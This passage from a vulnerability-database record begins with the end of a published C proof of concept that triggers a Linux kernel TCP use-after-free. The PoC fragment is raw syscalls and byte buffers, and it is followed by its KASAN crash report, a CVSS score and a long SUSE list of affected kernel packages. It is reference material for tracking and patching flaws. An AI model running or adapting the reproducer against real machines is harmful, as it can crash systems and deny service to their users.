\xc8\\x04\\x52\\x59\\x49\\xd4\\x08\\xd5\\x73\\x43\\x3f\\xd2\\xf9\\xa9\\xf0\\xd7\\xb9\\x97\\x86\\x9c\\x0a\\xc6\\x7d\\x5a\\x98\\x88\\x2b\\x0b\\x38\\xa1\\xcb\\xf8\\x71\\xc7\\x5d\\xfe\\xba\\xd0\\x26\\x4b\\xdf\\xb8\\x11\\x8f\\x71\\x60\\x68\\xc7\\x82\\xd0\\x36\\x97\\x23\\x56\\xda\\x52\\x58\\x90\\x0a\\x42\\x0b\\xfc\\xf8\\xc9\\x1f\\x36\\x7f\\x9f\\xe5\\x5b\\xf8\\x6e\\xe1\\x78\\x47\\xfe\\x6b\\x00\\xcd\\xe5\\x6b\\xe2\\xa6\\xaf\\x2b\\x33\\x95\\x73\\x79\\x52\\x13\\x1c\\x87\\x3d\\x8d\\xbc\\x32\\x1e\\x11\\x25\\x91\\x51\\xa0\\xaf\\xcc\\xf1\\xc3\\x5a\\xea\\x8b\\x15\\x82\\x76\\xa9\\x0f\\xe7\\x08\\x73\\x53\\x02\\x4c\\x8c\\xb2\\x8d\\x4b\\xa0\\xed\\x37\\x20\\x7f\\x54\\xa2\\x2a\\x33\\x6b\\x5f\\x3a\\x4f\\x54\\x61\\x85\\x91\\x86\\x68\\x5a\\xd4\\x80\\xc9\\x21\\xa9\\x16\\x5d\\x77\\xee\\x28\\xeb\\xc2\\x5c\\x22\\xe4\\x27\\xdb\\x5b\\xe4\\xa7\\x70\\xdc\\x6a\\x8e\\xd9\\xe7\\x77\\x09\\x5b\\x94\\x97\\xc6\\xf4\\x1f\\x7a\\x35\\x9e\\x26\\x1e\\x8b\\x37\\xe3\\xa4\\xdc\\x0a\\x8a\\x19\\x59\\x3a\\x77\\x81\\x2d\\x9b\\x0e\\x51\\x2b\\xd7\\xc5\\xbc\\x07\\xfa\\xf3\\x29\\x79\\x35\\x98\\xe3\\xb8\\xf7\\xe5\\x40\\xdf\\xa8\\x93\\x00\\xf6\\x53\\x8c\\xcc\\x33\\xdf\\x0e\\x35\\x3e\\x72\\x8d\\x48\\x85\\x05\\x40\\x43\\xe1\\x13\\xd6\\x4a\\x95\\x50\\xf8\\x32\\xca\\xc3\\x1c\\x28\\xd4\\x41\\x15\\x64\\xc1\\x08\\xfb\\x2c\\xc2\\x1f\\x79\\x30\\x58\\xaa\\x7c\\x0d\\x83\\x8e\\x87\\xf4\\x2e\\xa3\\xfc\\xeb\\xd0\\xdb\\xcc\\x15\\xcd\\x88\\x99\\x41\\x75\\x13\\xc1\\x0c\\x53\\x96\\xfe\\xff\\xeb\\x87\\x6a\\x04\\x75\\xf2\\x98\\x40\\x7e\\xc7\\x4e\\x47\\x63\\x31\\x2f\\xb2\\xa2\\x88\\x30\\xca\\x49\\xfb\\x57\\x40\\x65\\x8c\\xc9\\x80\\x20\\xb9\\xc9\\xfc\\x79\\x12\\x8d\\xe6\\x24\\x24\\x5f\\x38\\x47\\x3c\\x93\\x64\\x41\\x9a\\xf2\\xe8\\xab\\xc1\\xaf\\x13\\x95\\x5c\\x26\\x4e\\x02\\x99\\x5f\\x6a\\xe3\\xd4\\x91\\x0a\\xf5\\x06\\x3a\\x2d\\xc9\\x22\\x96\\x6b\\xa0\\x77\\x00\\x77\\x7c\\x26\\xdc\\xb6\\xc1\\x1b\\x6c\\xc8\\xfe\\x43\\x2c\\xe2\\xdc\\x58\\x7e\\x30\\x38\\x98\\x97\\xdf\\xda\\xae\\x9d\\x40\\x94\\xb7\\x16\\x91\\x66\\x94\\x6c\\x2a\\x50\\x39\\x69\\xce\\xb4\\x5c\\xec\\x2e\\x60\\x71\\x92\\xa3\\x14\\x1f\\x08\\x70\\xcb\\x9c\\x47\\x5b\\xf3\\xf4\\xea\\x7a\\x34\\x43\\x32\\x8b\\x19\\x57\\xd2\\xe7\\x1c\\xc5\\xeb\\xa5\\x66\\x37\\x73\\x80\\x59\\xac\\x1e\\xc0\\x2f\\xf1\\x30\\xf4\\xd0\\xc7\\x78\\x2b\\x38\\xd3\\xab\\x74\\xfd\\x4d\\xdf\\x5e\\xc5\\xa7\\x89\\x1b\\xb7\\x76\\xf5\\xf9\\xfd\\xca\\xfc\\xc2\\x0d\", 4096);\r\n r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);\r\n r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n *(uint32_t*)0x20022fdd = (uint32_t)0x28;\r\n *(uint32_t*)0x20022fe1 = (uint32_t)0x400;\r\n *(uint64_t*)0x20022fe5 = (uint64_t)0x0;\r\n *(uint64_t*)0x20022fed = (uint64_t)0x8ab;\r\n *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;\r\n *(uint16_t*)0x20022ffd = (uint16_t)0x5;\r\n r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);\r\n } else if (pid > 0) {\r\n int returnStatus;\r\n waitpid(pid, &returnStatus, 0);\r\n printf(\"collected child\\n\");\r\n } else {\r\n printf(\"fork failed\\n\");\r\n exit(1);\r\n }\r\n }\r\n return 0;\r\n}\r\n\r\n\r\n// KASAN report on v4.8-rc1, equivalent on master\r\n\r\n/*\r\n[ 21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428\r\n[ 21.447953] Read of size 4 by task rsyslogd/1612\r\n[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1\r\n[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014\r\n[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151\r\n[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400\r\n[ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400\r\n[ 21.452873] Call Trace:\r\n[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2\r\n[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70\r\n[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500\r\n[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70\r\n[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0\r\n[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0\r\n[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120\r\n[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0\r\n[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0\r\n[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0\r\n[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0\r\n[ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20\r\n[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0\r\n[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210\r\n[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0\r\n[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0\r\n[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50\r\n[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0\r\n[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240\r\n[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0\r\n[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0\r\n[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120\r\n[ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410\r\n[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0\r\n[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550\r\n[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0\r\n[ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0\r\n[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50\r\n[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0\r\n[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90\r\n[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50\r\n[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0\r\n[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0\r\n[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340\r\n[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750\r\n[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0\r\n[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20\r\n[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50\r\n[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500\r\n[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0\r\n[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0\r\n[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0\r\n[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120\r\n[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280\r\n[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350\r\n[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420\r\n[ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40\r\n[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0\r\n[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170\r\n[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580\r\n[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0\r\n[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0\r\n[ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20\r\n[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110\r\n[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30\r\n[ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340\r\n[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d\r\n[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140\r\n[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0\r\n[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90\r\n[ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424\r\n[ 21.494277] Allocated:\r\n[ 21.494538] PID = 1711\r\n[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50\r\n[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0\r\n[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0\r\n[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20\r\n[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0\r\n[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0\r\n[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790\r\n[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10\r\n[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350\r\n[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110\r\n[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0\r\n[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640\r\n[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0\r\n[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0\r\n[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8\r\n[ 21.504144] Freed:\r\n[ 21.504368] PID = 1711\r\n[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50\r\n[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0\r\n[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0\r\n[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210\r\n[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0\r\n[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30\r\n[ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10\r\n[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350\r\n[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110\r\n[ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0\r\n[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640\r\n[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0\r\n[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0\r\n[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8\r\n[ 21.513258] Memory state around the buggy address:\r\n[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc\r\n[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.516114] ^\r\n[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.518203] ==================================================================\r\n*/", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40731/"}], "suse": [{"lastseen": "2016-12-02T17:30:07", "references": ["https://bugzilla.suse.com/989779", "https://bugzilla.suse.com/908684", "https://bugzilla.suse.com/908458", "https://bugzilla.suse.com/909077", "https://bugzilla.suse.com/799133", "https://bugzilla.suse.com/999932", "https://bugzilla.suse.com/1005903", "https://bugzilla.suse.com/991608", "https://bugzilla.suse.com/763198", "https://bugzilla.suse.com/967716", "https://bugzilla.suse.com/909994", "https://bugzilla.suse.com/929141", "https://bugzilla.suse.com/911687", "https://bugzilla.suse.com/1002165", "https://bugzilla.suse.com/984992", "https://bugzilla.suse.com/988440", "https://bugzilla.suse.com/971975", "https://bugzilla.suse.com/1005857", "https://bugzilla.suse.com/998689", "https://bugzilla.suse.com/994296", "https://bugzilla.suse.com/1000189", "https://bugzilla.suse.com/983619", "https://bugzilla.suse.com/909484", "https://bugzilla.suse.com/909350", "https://bugzilla.suse.com/977687", "https://bugzilla.suse.com/987565", "https://bugzilla.suse.com/1006917", "https://bugzilla.suse.com/974620", "https://bugzilla.suse.com/991665", "https://bugzilla.suse.com/922634", "https://bugzilla.suse.com/973203", "https://bugzilla.suse.com/982783", "https://bugzilla.suse.com/991923", "https://bugzilla.suse.com/996329", "https://bugzilla.suse.com/1003568", "https://bugzilla.suse.com/1003866", "https://bugzilla.suse.com/1003077", "https://bugzilla.suse.com/951392", "https://bugzilla.suse.com/980371", "https://bugzilla.suse.com/860441", "https://bugzilla.suse.com/865783", "https://bugzilla.suse.com/992566", "https://bugzilla.suse.com/979514", "https://bugzilla.suse.com/999584", "https://bugzilla.suse.com/989152", "https://bugzilla.suse.com/986365", "https://bugzilla.suse.com/986362", "https://bugzilla.suse.com/803320", "https://bugzilla.suse.com/1004520", "https://bugzilla.suse.com/1007944", "https://bugzilla.suse.com/979595", "https://bugzilla.suse.com/963655", "https://bugzilla.suse.com/839104", "https://bugzilla.suse.com/1003344", "https://bugzilla.suse.com/907611", "https://bugzilla.suse.com/960689", "https://bugzilla.suse.com/968014", "https://bugzilla.suse.com/999600", "https://bugzilla.suse.com/994759", "https://bugzilla.suse.com/771065", "https://bugzilla.suse.com/986445", "https://bugzilla.suse.com/994618", "https://bugzilla.suse.com/1006919", "https://bugzilla.suse.com/843236", "https://bugzilla.suse.com/1001419", "https://bugzilla.suse.com/984194", "https://bugzilla.suse.com/993890", "https://bugzilla.suse.com/922947", "https://bugzilla.suse.com/956514", "https://bugzilla.suse.com/871728", "https://bugzilla.suse.com/1004517", "https://bugzilla.suse.com/994926", "https://bugzilla.suse.com/979681", "https://bugzilla.suse.com/996664", "https://bugzilla.suse.com/989764", "https://bugzilla.suse.com/993127", "https://bugzilla.suse.com/994436", "https://bugzilla.suse.com/989261", "https://bugzilla.suse.com/968010", "https://bugzilla.suse.com/1003925", "https://bugzilla.suse.com/976867", "https://bugzilla.suse.com/984102", "https://bugzilla.suse.com/982218", "https://bugzilla.suse.com/928138", "https://bugzilla.suse.com/915183", "https://bugzilla.suse.com/983535", "https://bugzilla.suse.com/993891", "https://bugzilla.suse.com/863873", "https://bugzilla.suse.com/934760", "https://bugzilla.suse.com/1005896", "https://bugzilla.suse.com/909618", "https://bugzilla.suse.com/998399", "https://bugzilla.suse.com/985206", "https://bugzilla.suse.com/997708", "https://bugzilla.suse.com/971989", "https://bugzilla.suse.com/920016", "https://bugzilla.suse.com/999907", "https://bugzilla.suse.com/986337", "https://bugzilla.suse.com/1003677", "https://bugzilla.suse.com/995968"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-pae", "packageFilename": "kernel-pae-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-trace-debuginfo", "packageFilename": "kernel-trace-debuginfo-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-default", "packageFilename": "kernel-default-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-trace-devel-debuginfo", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-pae-debuginfo", "packageFilename": "kernel-pae-debuginfo-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-ppc64-debugsource", "packageFilename": "kernel-ppc64-debugsource-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-pae-devel-debuginfo", "packageFilename": "kernel-pae-devel-debuginfo-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-trace-base", "packageFilename": "kernel-trace-base-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-pae-devel", "packageFilename": "kernel-pae-devel-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-trace-debugsource", "packageFilename": "kernel-trace-debugsource-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-ec2-debuginfo", "packageFilename": "kernel-ec2-debuginfo-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-trace-devel", "packageFilename": "kernel-trace-devel-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "s390x", "packageName": "kernel-trace", "packageFilename": "kernel-trace-3.0.101-88.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-ec2-base", "packageFilename": "kernel-ec2-base-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-trace-devel-debuginfo", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-ppc64-devel", "packageFilename": "kernel-ppc64-devel-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "i586", "packageName": "kernel-xen-devel-debuginfo", "packageFilename": "kernel-xen-devel-debuginfo-3.0.101-88.1.i586.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-default-devel-debuginfo", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.0.101-88.1.ppc64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ia64", "packageName": "kernel-source", "packageFilename": "kernel-source-3.0.101-88.1.ia64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server EXTRA", "OSVersion": "11", "packageVersion": "3.0.101-88.1", "arch": "x86_64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.0.101-88.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-88.1", "arch": "ppc64", "packageName": "kernel-trace-debugsource", "packageFilename": 